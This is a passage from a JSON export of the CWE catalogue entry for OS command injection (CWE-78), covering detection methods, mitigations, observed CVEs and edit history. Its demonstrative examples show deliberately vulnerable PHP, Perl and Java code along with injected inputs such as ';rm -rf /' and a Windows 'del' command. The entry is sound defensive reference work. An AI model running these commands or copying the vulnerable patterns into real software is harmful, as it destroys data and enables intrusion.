Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize Data into a Control Plane (\'Command Injection\')","attr":{"@_Date":"2009-07-27"}},{"#text":"Improper Sanitization of Special Elements used in a Command (\'Command Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"78":{"attr":{"@_ID":"78","@_Name":"Improper Neutralization of Special Elements used in an OS Command (\'OS Command Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.","Extended_Description":{"xhtml:p":["This could allow attackers to execute unexpected, dangerous commands directly on the operating system. This weakness can lead to a vulnerability in environments in which the attacker does not have direct access to the operating system, such as in web applications. Alternately, if the weakness occurs in a privileged program, it could allow the attacker to specify commands that normally would not be accessible, or to call alternate commands with privileges that the attacker does not have. The problem is exacerbated if the compromised process does not follow the principle of least privilege, because the attacker-controlled commands may run with special system privileges that increases the amount of damage.","There are at least two subtypes of OS command injection:","From a weakness standpoint, these variants represent distinct programmer errors. In the first variant, the programmer clearly intends that input from untrusted parties will be part of the arguments in the command to be executed. In the second variant, the programmer does not intend for the command to be accessible to any untrusted party, but the programmer probably has not accounted for alternate ways in which malicious attackers can provide input."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["The application intends to execute a single, fixed program that is under its own control. It intends to use externally-supplied inputs as arguments to that program. For example, the program might use system(\\"nslookup [HOSTNAME]\\") to run nslookup and allow the user to supply a HOSTNAME, which is used as an argument. Attackers cannot prevent nslookup from executing. However, if the program does not remove command separators from the HOSTNAME argument, attackers could place the separators into the arguments, which allows them to execute their own program after nslookup has finished executing.","The application accepts an input that it uses to fully select which program to run, as well as which commands to use. The application simply redirects this entire command to the operating system. For example, the program might use \\"exec([COMMAND])\\" to execute the [COMMAND] that was supplied by the user. If the COMMAND is under attacker control, then the attacker can execute arbitrary commands or programs. If the command is being executed using functions like exec() and CreateProcess(), the attacker might not be able to combine multiple commands together in the same line."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"88","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Shell injection"},{"Term":"Shell metacharacters"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Non-Repudiation"],"Impact":["Execute Unauthorized Code or Commands","DoS: Crash, Exit, or Restart","Read Files or Directories","Modify Files or Directories","Read Application Data","Modify Application Data","Hide Activities"],"Note":"Attackers could execute unauthorized commands, which could then be used to disable the software, or read and modify data for which the attacker does not have permissions to access directly. Since the targeted application is directly executing the commands instead of the attacker, any malicious activities may appear to come from the application or the application\'s owner."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes.","Automated static analysis might not be able to detect the usage of custom API functions or third-party libraries that indirectly invoke OS commands, leading to false negatives - especially if the API/library code is not available for analysis."]},"Effectiveness_Notes":"This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-10"},"Method":"Manual Static Analysis","Description":"Since this weakness does not typically appear frequently within a single software package, manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all potentially-vulnerable operations can be assessed within limited time constraints.","Effectiveness":"High"},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"If at all possible, use library calls rather than external processes to recreate the desired functionality."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."},{"Phase":"Architecture and Design","Strategy":"Attack Surface Reduction","Description":"For any data that will be used to generate a command to be executed, keep as much of that data out of external control as possible. For example, in web applications, this may require storing the data locally in the session\'s state instead of sending it out to the client in a hidden form field."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-4.3"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"Phase":"Implementation","Description":"If the program to be executed allows arguments to be specified within an input file or from standard input, then consider using that mode to pass arguments instead of the command line."},{"attr":{"@_Mitigation_ID":"MIT-27"},"Phase":"Architecture and Design","Strategy":"Parameterization","Description":{"xhtml:p":["If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.","Some languages offer multiple functions that can be used to invoke commands. Where possible, identify any function that invokes a command shell using a single string, and replace it with a function that requires individual arguments. These functions typically perform appropriate quoting and filtering of arguments. For example, in C, the system() function accepts a string that contains the entire command to be executed, whereas execl(), execve(), and others require an array of strings, one for each argument. In Windows, CreateProcess() only accepts one command at a time. In Perl, if system() is provided with an array of arguments, then it will quote each of the arguments."]}},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When constructing OS command strings, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. This will indirectly limit the scope of an attack, but this technique is less important than proper output encoding and escaping.","Note that proper output encoding, escaping, and quoting is the most effective solution for preventing OS command injection, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent OS command injection, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, when invoking a mail program, you might need to allow the subject field to contain otherwise-dangerous inputs like \\";\\" and \\">\\" characters, which would need to be escaped or otherwise handled. In this case, stripping the character might reduce the risk of OS command injection, but it would produce incorrect behavior because the subject field would not be recorded as the user intended. This might seem to be a minor inconvenience, but it could be more important when the program relies on well-structured subject lines in order to pass messages to other components.","Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address."]}},{"attr":{"@_Mitigation_ID":"MIT-21"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":"When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs."},{"attr":{"@_Mitigation_ID":"MIT-32"},"Phase":"Operation","Strategy":"Compilation or Build Hardening","Description":"Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl\'s \\"-T\\" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184)."},{"attr":{"@_Mitigation_ID":"MIT-32"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl\'s \\"-T\\" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184)."},{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.","In the context of OS Command Injection, error information passed back to the user might reveal whether an OS command is being executed and possibly which command is being used."]}},{"Phase":"Operation","Strategy":"Sandbox or Jail","Description":"Use runtime policy enforcement to create an allowlist of allowable commands, then prevent use of any command that does not appear in the allowlist. Technologies such as AppArmor are available to do this."},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This example code intends to take the name of a user and list the contents of that user\'s home directory. It is subject to the first variant of OS command injection.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$userName = $_POST[\\"user\\"];$command = \'ls -l /home/\' . $userName;system($command);","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":";rm -rf /"},{"attr":{"@_Nature":"result"},"xhtml:div":"ls -l /home/;rm -rf /"}],"Body_Text":["The $userName variable is not checked for malicious input. An attacker could set the $userName variable to an arbitrary OS command such as:","Which would result in $command being:","Since the semi-colon is a command separator in Unix, the OS would first execute the ls command, then the rm command, deleting the entire file system.","Also note that this example code is vulnerable to Path Traversal (CWE-22) and Untrusted Search Path (CWE-426) attacks."]},{"Intro_Text":"This example is a web application that intends to perform a DNS lookup of a user-supplied domain name. It is subject to the first variant of OS command injection.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"use CGI qw(:standard);$name = param(\'name\');$nslookup = \\"/path/to/nslookup\\";print header;if (open($fh, \\"$nslookup $name|\\")) {}","xhtml:br":["","","",""],"xhtml:div":{"#text":"while (<$fh>) {}close($fh);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"print escapeHTML($_);print \\"<br>\\\\n\\";","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":""}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"cwe.mitre.org%20%3B%20/bin/ls%20-l"},{"attr":{"@_Nature":"result"},"xhtml:div":"/path/to/nslookup cwe.mitre.org ; /bin/ls -l"}],"Body_Text":["Suppose an attacker provides a domain name like this:","The \\"%3B\\" sequence decodes to the \\";\\" character, and the %20 decodes to a space. The open() statement would then process a string like this:","As a result, the attacker executes the \\"/bin/ls -l\\" command and gets a list of all the files in the program\'s working directory. The input could be replaced with much more dangerous commands, such as installing a malicious program on the server."]},{"Intro_Text":"The example below reads the name of a shell script to execute from the system properties. It is subject to the second variant of OS command injection.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String script = System.getProperty(\\"SCRIPTNAME\\");if (script != null)","xhtml:br":"","xhtml:div":{"#text":"System.exec(script);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"If an attacker has control over this property, then they could modify the property to point to a dangerous program."},{"Intro_Text":"In the example below, a method is used to transform geographic coordinates from latitude and longitude format to UTM format. The method gets the input coordinates from a user through a HTTP request and executes a program local to the application server that performs the transformation. The method passes the latitude and longitude coordinates as a command-line option to the external program and will perform some processing to retrieve the results of the transformation and return the resulting UTM coordinates.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String coordinateTransformLatLonToUTM(String coordinates){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String utmCoords = null;try {}catch(Exception e) {...}return utmCoords;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String latlonCoords = coordinates;Runtime rt = Runtime.getRuntime();Process exec = rt.exec(\\"cmd.exe /C latlon2utm.exe -\\" + latlonCoords);","xhtml:br":["","","","","",""],"xhtml:i":["// process results of coordinate transform","// ..."]}}}}}},"Body_Text":"However, the method does not verify that the contents of the coordinates input parameter includes only correctly-formatted latitude and longitude coordinates. If the input coordinates were not validated prior to the call to this method, a malicious user could execute another program local to the application server by appending \'&\' followed by the command for another program to the end of the coordinate string. The \'&\' instructs the Windows operating system to execute another program."},{"attr":{"@_Demonstrative_Example_ID":"DX-28"},"Intro_Text":"The following code is from an administrative web application designed to allow users to kick off a backup of an Oracle database using a batch-file wrapper around the rman utility and then run a cleanup.bat script to delete some temporary files. The script rmanDB.bat accepts a single command line parameter, which specifies what type of backup to perform. Because access to the database is restricted, the application runs the backup as a privileged user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...String btype = request.getParameter(\\"backuptype\\");String cmd = new String(\\"cmd.exe /K \\\\\\"System.Runtime.getRuntime().exec(cmd);...","xhtml:br":["","","",""],"xhtml:div":{"#text":"c:\\\\\\\\util\\\\\\\\rmanDB.bat \\"+btype+\\"&&c:\\\\\\\\utl\\\\\\\\cleanup.bat\\\\\\"\\")","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The problem here is that the program does not do any validation on the backuptype parameter read from the user. Typically the Runtime.exec() function will not execute multiple commands, but in this case the program first runs the cmd.exe shell in order to run multiple commands with a single call to Runtime.exec(). Once the shell is invoked, it will happily execute multiple commands separated by two ampersands. If an attacker passes a string of the form \\"& del c:\\\\\\\\dbms\\\\\\\\*.*\\", then the application will execute this command along with the others specified by the program. Because of the nature of the application, it runs with the privileges necessary to interact with the database, which means whatever command the attacker injects will run with those privileges as well."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0067","Description":"Canonical example of OS command injection. CGI program does not neutralize \\"|\\" metacharacter when invoking a phonebook program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0067"},{"Reference":"CVE-2001-1246","Description":"Language interpreter\'s mail function accepts another argument that is concatenated to a string used in a dangerous popen() call. Since there is no neutralization of this argument, both OS Command Injection (CWE-78) and Argument Injection (CWE-88) are possible.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1246"},{"Reference":"CVE-2002-0061","Description":"Web server allows command execution using \\"|\\" (pipe) character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0061"},{"Reference":"CVE-2003-0041","Description":"FTP client does not filter \\"|\\" from filenames returned by the server, allowing for OS command injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0041"},{"Reference":"CVE-2008-2575","Description":"Shell metacharacters in a filename in a ZIP archive","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2575"},{"Reference":"CVE-2002-1898","Description":"Shell metacharacters in a telnet:// link are not properly handled when the launching application processes the link.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1898"},{"Reference":"CVE-2008-4304","Description":"OS command injection through environment variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4304"},{"Reference":"CVE-2008-4796","Description":"OS command injection through https:// URLs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4796"},{"Reference":"CVE-2007-3572","Description":"Chain: incomplete denylist for OS command injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3572"},{"Reference":"CVE-2012-1988","Description":"Product allows remote users to execute arbitrary commands by creating a file whose pathname contains shell metacharacters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1988"}]},"Functional_Areas":{"Functional_Area":"Program Invocation"},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"OS Command Injection"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A3","Entry_Name":"Malicious File Execution","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A6","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV03-C","Entry_Name":"Sanitize the environment when invoking external programs"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV33-C","Entry_Name":"Do not call system()","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR02-C","Entry_Name":"Sanitize data passed to complex subsystems"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":31,"Entry_Name":"OS Commanding"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS07-J","Entry_Name":"Do not pass untrusted, unsanitized data to the Runtime.exec() method"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-78"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"108"}},{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"6"}},{"attr":{"@_CAPEC_ID":"88"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-140"}},{"attr":{"@_External_Reference_ID":"REF-685"}},{"attr":{"@_External_Reference_ID":"REF-686"}},{"attr":{"@_External_Reference_ID":"REF-687","@_Section":"chapter: "CGI Scripts""}},{"attr":{"@_External_Reference_ID":"REF-688"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 10: Command Injection." Page 171"}},{"attr":{"@_External_Reference_ID":"REF-690"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, "Shell Metacharacters", Page 425"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-78"}}]},"Notes":{"Note":[{"#text":"The \\"OS command injection\\" phrase carries different meanings to different people. For some people, it only refers to cases in which the attacker injects command separators into arguments for an application-controlled program that is being invoked. For some people, it refers to any type of attack that can allow the attacker to execute OS commands of their own choosing. This usage could include untrusted search path weaknesses (CWE-426) that cause the application to find and execute an attacker-controlled program. Further complicating the issue is the case when argument injection (CWE-88) allows alternate command-line switches or options to be inserted into the command line, such as an \\"-exec\\" switch whose purpose may be to execute the subsequent argument as a command (this -exec switch exists in the UNIX \\"find\\" command, for example). In this latter case, however, CWE-88 could be regarded as the primary weakness in a chain with CWE-78.","attr":{"@_Type":"Terminology"}},{"#text":"More investigation is needed into the distinction between the OS command injection variants, including the role with argument injection (CWE-88). Equivalent distinctions may exist in other injection-related problems such as SQL injection.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Research_Gaps, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name, Related_Attack_Patterns"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Name, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Observed_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Description, Detection_Factors, Name, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Terminology_Notes"},{"Modification_Name":"CWE Content 